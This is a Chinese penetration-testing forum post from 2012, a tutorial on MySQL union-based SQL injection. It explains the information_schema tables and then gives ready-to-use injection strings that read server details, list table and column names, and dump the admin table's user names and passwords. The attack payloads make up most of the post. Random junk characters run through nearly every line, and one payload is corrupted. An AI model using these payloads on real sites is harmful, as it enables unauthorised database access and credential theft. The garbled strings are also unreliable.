中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
+ A. \  c) o' O. |8 H; S
9 d' S+ d/ f7 k学习盲注前先了解下 IFORMATION_SCHEMA 库
, i1 S9 x0 R4 c( V9 g3 ?1 J, `
: |, a+ D8 a0 b, a4 SMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有% Q* J, Y8 @1 _( }! G, y3 J
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。* C% N3 w" @$ D3 l& \' c
1.得到所有数据库名:4 G7 Q* `! T- Q4 B- S$ f) h
|SCHEMATA ->存储数据库名的表3 F9 @) \( o; J, h6 s" Z
|---字段:SCHEMA_NAME ->数据库名称
0 n, \. S2 J" M3 `* A0 Y- D3 G9 g3 z" c
|TABLES ->存储表名
& E6 d$ Q& c6 D8 t( ^" t1 I|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名% {  d/ a4 Y4 m9 ~4 t0 J1 t
|---字段:TABLE_NAME ->存储表的表名
0 N( [2 C) S* ?# r1 ^3 ~$ l5 i6 l. L  I
|COLUMNS ->存储的字段名表2 l, f: F1 G) K# C' [. D
|---字段:TABLE_SCHEMA ->该字段所属数据库名# ?! f8 k. g4 E$ E) z! p
|---字段:TABLE_NAME ->存储所属表的名称6 Q6 R9 _8 H$ V1 u, a9 }
4 ~+ V4 ?5 i' L
|---字段:COLUMN_NAME ->该字段的名称4 q: y, X. Y/ t$ y
6 S( Z9 x% @/ Q! Z

" i1 e- m' Z: {: `; u6 D. k
( H8 G# [4 n2 j% o8 R###########################################################################+ }" O2 T# c0 T5 ?% x

  N; X# s1 e/ z6 G/ G0x001 获取系统信息:
0 o8 {- a9 L: t
; _% F9 R8 ?$ ~. w8 X/ F9 z( kunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*7 k) g+ {8 d9 _. t) b

. m0 ~8 q% N7 A9 D& ?; e/*
! \5 ]: M) p6 e+ _% Y3 y& c
" ~" K/ V2 k0 C) Z@@global.version_compile_os 获取系统版本3 {' O0 F* _) P, w- [5 ^& W/ x5 E
, k  n# }) M1 r
@@datadir 数据库路径/ D5 F2 U) [  R  u: {* B
database() 当前数据库名称
3 H0 Q" v- ^" ^/ Z0x3c62723e 换行HEX值
/ w, g( ^( w) Q$ `8 B* i3 M
2 H) `% o; D( }7 f5 I0 T+ V*/
" o+ J, D! ]" n' v/ K8 C& N% |& _! w! o

% g% A1 y4 n" h; d
, I9 J% |  n1 b/ K. e& Y######################################################################; Q* b( e' g% N$ L
$ _$ T5 w$ M6 j) h8 \" J7 U
0x002 获取表名% K7 M4 J% W6 ?: q' A

2 w) T) P5 E: y; z1 lunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*- H/ i; d5 F$ _

# Y0 }0 s3 q* t9 M& _% Z* k
5 }- `5 C; d' O6 E6 z/ F
% b) _. }. [* I- Z3 V2 f/*9 b0 I( ]7 i$ Q- a
. G: T9 Y- T$ X5 l( U0 H
0x67617264656e 为当前数据库名, e2 C' n& |9 i4 S% K6 Z; D& h$ n
; H" ?( J: D) q/ z7 j9 B+ m
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名8 Q7 p) R7 y) A5 T
& R/ F. f4 [/ P! I1 U. j* Z
*/* |1 {6 v: \; t

) O7 u' V+ _& K! X/ w######################################################################; H2 M( ]: {. {* ^( ]
1 g( Y5 }* C. t4 c/ X" m
: H4 v& E% F/ D) F/ k* }+ [
4 J! m5 C! w/ _) _
0x003 获取字段
6 Z( Q" |7 p) L  ?; ], a' A9 K: v/ _& J7 Y
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*; e3 H! r7 F9 G3 R) w/ j) r: Y

9 B# F. {5 z+ N" Z5 S/*( s2 O% _& `, B9 M- S" Z5 C
1 Y% f7 E8 A' `' ]$ F* h) o
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
2 [% d+ r  B1 p8 i& Y
) g/ M3 j2 H' \% N' ^- T7 T1 r2 u7 I0x61646d696e ->选择一个表
3 t/ ?3 X2 g/ ]0 M4 o2 B
  E5 W6 d* z; k( a9 K  Y1 A: e0x67617264656e ->数据库名
: _$ O+ G, g3 Y% f- T3 j/ \, c
1 A% q" P9 h* m% w, P. z( W*// T/ C# |* r' `$ m, u7 w3 D3 h3 S2 k

$ e2 r% _. I% _5 K/ e6 i5 Y#####################################################################: e7 g) n3 O' o& T, T# j

6 s3 X7 |+ L! ^9 @
+ r  y7 L% H: \4 U' ~' w4 i
7 [6 i* F) P: k4 m0x004 获取数据
0 s& @5 [5 b6 A
  r6 r. t, W+ H  r- Eunion select 1,2,3
5 T. S7 H, ~* n,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
. v' e. Q$ K/ \; D  \( o
/ y% }. D. N8 Uunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin: k( e5 [  K; X+ \- ~" q$ T
! Z+ M3 ]% A: U2 x2 n
6 u- r5 m8 C, c) T3 ^9 ?% I
& L2 t! Q8 y- t2 n3 W
/*, u% q# v- Y  j+ C
9 m: P; j4 f" _
0x3c62723e 换行符号HEX编码! P1 }. M- n/ X$ l$ f+ ?* K$ T

0 Z0 H( `; K+ a* J( J1 b% g7 jgroup_concat 同时获得该字段所有数据
& E+ T0 ?2 J5 F" e2 s4 N4 b! ?# S0 v; C- t4 v) r: D
*/
2 i3 d) c! n; p/ y' R  o3 Y. M  R- ?. o2 L





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2